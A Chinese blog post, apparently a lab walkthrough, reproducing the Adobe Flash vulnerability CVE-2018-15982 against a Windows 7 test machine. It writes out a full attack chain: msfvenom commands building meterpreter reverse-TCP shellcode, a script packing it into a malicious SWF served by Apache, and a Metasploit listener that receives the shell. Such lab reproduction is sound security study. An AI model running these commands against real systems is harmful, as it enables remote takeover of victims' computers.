漏洞payload 靶机_CVE-2018-15982漏洞复现

开篇闲聊:

自从上次写完CVE-2018-4878后我就在想,有没有能简单粗暴干掉我的Win10主机的办法,找了半天,果然没找到(说不出是开心还是悲伤),但是找到了这个最接近最新版本的Flash的漏洞。

漏洞概述:

受影响的版本:

Adobe Flash Player <= 31.0.0.153

Adobe Flash Player Installer<= 31.0.0.108

不受影响的版本:

Adobe Flash Player 32.0.0.101

Adobe Flash Player Installer 31.0.0.122

作者的版本刚好是最底下的那个.....

不过我仔细看了它的起源经过:

2018年11月29日,360高级威胁应对团队在全球范围内第一时间发现一起针对俄罗斯的APT攻击行动,通过一份俄文内容的医院员工问卷文档,携带最新的Flash 0day漏洞和具有自毁功能的专属木马程序,该漏洞(CVE-2018-15982)允许攻击者恶意制作的Flash对象在受害者的计算机上执行代码,从而获取对系统命令行的访问权限。

看起来是个很时髦的漏洞,来开始吧!

复现环境:

Kail linux

Win7 + Flash 28(为啥不选最新版本呢?因为这个是做完4878剩下的环境,懒得再下新版了哈哈)

POC: https://github.com/B1eed/VulRec/tree/master/CVE-2018-15982

复现过程:

1、创建payload程序

root@wuyou:~/CVE-2018-15982# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.190.134 LPORT=4444 -f raw > 64.bin

root@wuyou:~/CVE-2018-15982# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.190.134 LPORT=4444 -f raw > 86.bin

2、生成文件视频文件和网页

root@wuyou:~/CVE-2018-15982# python CVE-2018-15982.py -i 86.bin -I 64.bin -o exploit.swf

3、开启Apache服务

root@wuyou:~/CVE-2018-4878# service apache2 start

root@wuyou:~/CVE-2018-4878# cp index.html /var/www/html/index.html

root@wuyou:~/CVE-2018-4878# cp exploit.swf /var/www/html/exploit.swf

4、开始监听

root@wuyou:~# msfconsole

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.190.134

msf exploit(handler) > set lport 4444

msf exploit(handler) > exploit

5、在靶机打开网页

192.168.190.134/index.html

页面内容

这是渗透机已经成功获取到Session了!

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值